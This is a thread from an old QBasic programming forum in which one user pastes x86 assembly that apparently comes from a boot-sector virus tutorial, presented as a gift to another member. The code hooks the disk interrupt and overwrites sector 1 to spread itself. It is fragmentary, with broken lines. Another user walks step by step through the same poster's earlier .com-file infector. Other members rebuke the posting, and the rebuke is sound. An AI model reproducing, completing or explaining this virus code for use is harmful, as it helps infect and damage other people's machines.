Posts: 1,057
Threads: 156
Joined: Aug 2003
is there an index for the www.qbasicnews.com/?blast= sites?
Posts: 1,752
Threads: 21
Joined: Jun 2002
Posts: 1,057
Threads: 156
Joined: Aug 2003
thank you very much and to show my thanks i give you this Code: Set SS:SP to 0:7C00 :
cli
xor ax,ax
mov ss,ax
mov sp,7c00h
sti s
dec word ptr [413h]
int 12h
mov cl,6
shl ax,cl
mov es,ax
mov cx,512
rep movsb
mov si,13h*4
mov di,offset int13storage
movsw
movsw
mov word ptr [si-4],offset int13handler
mov word ptr [si-2],es
int 19h
cmp ah,2
jne exit_int13
cmp cx,1
jne exit_int13
or dh,dh
jnz exit_int13
pushf
call dword ptr cs:int13storage
cmp word ptr es:[bx+offset marker]
je
mov cx,2
mov ax,201h
call orig_int13h
mov ax,301h
mov cx,2
call orig_int13h
xor bx,bx
push cs
pop es
mov cx,1
mov ax,301h
call orig_int13h
Posts: 309
Threads: 15
Joined: Jul 2003
What is he posting this time?
Iam just curious after this: http://forum.qbasicnews.com/viewtopic.php?t=3720
hrist Jesus came into the world to save sinners, of whom I am first.(I Timothy 1:15)
For God so loved the world, that He gave His only begotten Son,
that whoever believes in Him should not perish, but have eternal life.(John 3:16)
Posts: 1,752
Threads: 21
Joined: Jun 2002
Really, pasting code from virus tutorials just makes you look like an idiot. Especially when you don't even know how to assemble it.
Posts: 1,845
Threads: 44
Joined: Aug 2002
Very very nice... However, I won't do anything with it than look at it now, but I'd like you to first beta-test and debug your code (that means running it).
When you post something like that next time, please test it on your computer first. And then estimate how we would like the same effect on our computers. You must have already guessed it: not funny.
Posts: 1,845
Threads: 44
Joined: Aug 2002
SCM:
His previous (the *.com): - Looking at the code:
In line 6-8 it tries to find *.com file. It takes the first it gets. (int21/ah=4e)
In line 9-12 it opens the found *.com file (int21/ah=3d)
In line 14-17 it writes itself to the file (actually everything between startvx and endvx) (int21/ah=40)
In line 18-19 it closes the file (int21/ah=3e)
In line 20 it ends the program (int20)
However, if'd read further, you would have noticed Plasma357 already answered your question
What he posted above: - It's about the BOOTSTRAP LOADER, which is int19. Take a look at the docs about it:
Quote:SYSTEM - BOOTSTRAP LOADER
Desc: This interrupt reboots the system without clearing memory or restoring interrupt vectors. Because interrupt vectors are preserved, this interrupt usually causes a system hang if any TSRs have hooked vectors from 00h through 1Ch, particularly INT 08.
Notes: Usually, the BIOS will try to read sector 1, head 0, track 0 from drive
A:To 0000h:7C00h. If this fails, and a hard disk is installed, the
BIOS will read sector 1, head 0, track 0 of the first hard disk.
This sector should contain a master bootstrap loader and a partition
table (see #00650). After loading the master boot sector at
0000h:7C00h, the master bootstrap loader is given control
(see #00653). It will scan the partition table for an active
partition, and will then load the operating system's bootstrap
loader (contained in the first sector of the active partition) and
give it control..
True IBM PCs and most clones issue an INT 18 if neither floppy nor hard
disk have a valid boot sector.
To accomplish a warm boot equivalent to Ctrl-Alt-Del, store 1234h in
0040h:0072h and jump to FFFFh:0000h. For a cold boot equivalent to
a reset, store 0000h at 0040h:0072h before jumping..
VDISK.SYS hooks this interrupt to allow applications to find out how
much extended memory has been used by VDISKs (see #00649). DOS 3.3+
PRINT hooks INT 19 but does not set up a correct VDISK header block
at the beginning of its INT 19 handler segment, thus causing some
programs to overwrite extended memory which is already in use..
The default handler is at F000h:E6F2h for 100% compatible BIOSes.
MS-DOS 3.2+ hangs on booting (even from floppy) if the hard disk
contains extended partitions which point at each other in a loop,
since it will never find the end of the linked list of extended
partitions.
Under Windows Real and Enhanced modes, calling INT 19 will hang the
system in the same was as under bare DOS; under Windows Standard
mode, INT 19 will successfully perform a cold reboot as it appears
to have been redirected to a MOV AL,0FEh/OUT 64h,AL sequence
BUG: When loading the remainder of the DOS system files fails, various versions of IBMBIO.COM/IO.SYS incorrectly restore INT 1E before calling INT 19, assuming that the boot sector had stored the contents of INT 1E at DS:SI instead of on the stack as it actually does
Posts: 1,057
Threads: 156
Joined: Aug 2003
i thought it was a nice one. yeah i'll stop sharing my 1337 codes with every one
Posts: 1,845
Threads: 44
Joined: Aug 2002
Good
But one point, viruses are never 'nice', and the virus code is determined not to be 1337.
Keep that in mind please.
Posts: 1,057
Threads: 156
Joined: Aug 2003
there was that nice worm that patched the msblast problem, but it crashed servers because it pinged the crap out of everyone to go fixed other people who were in contact with and infected computers
|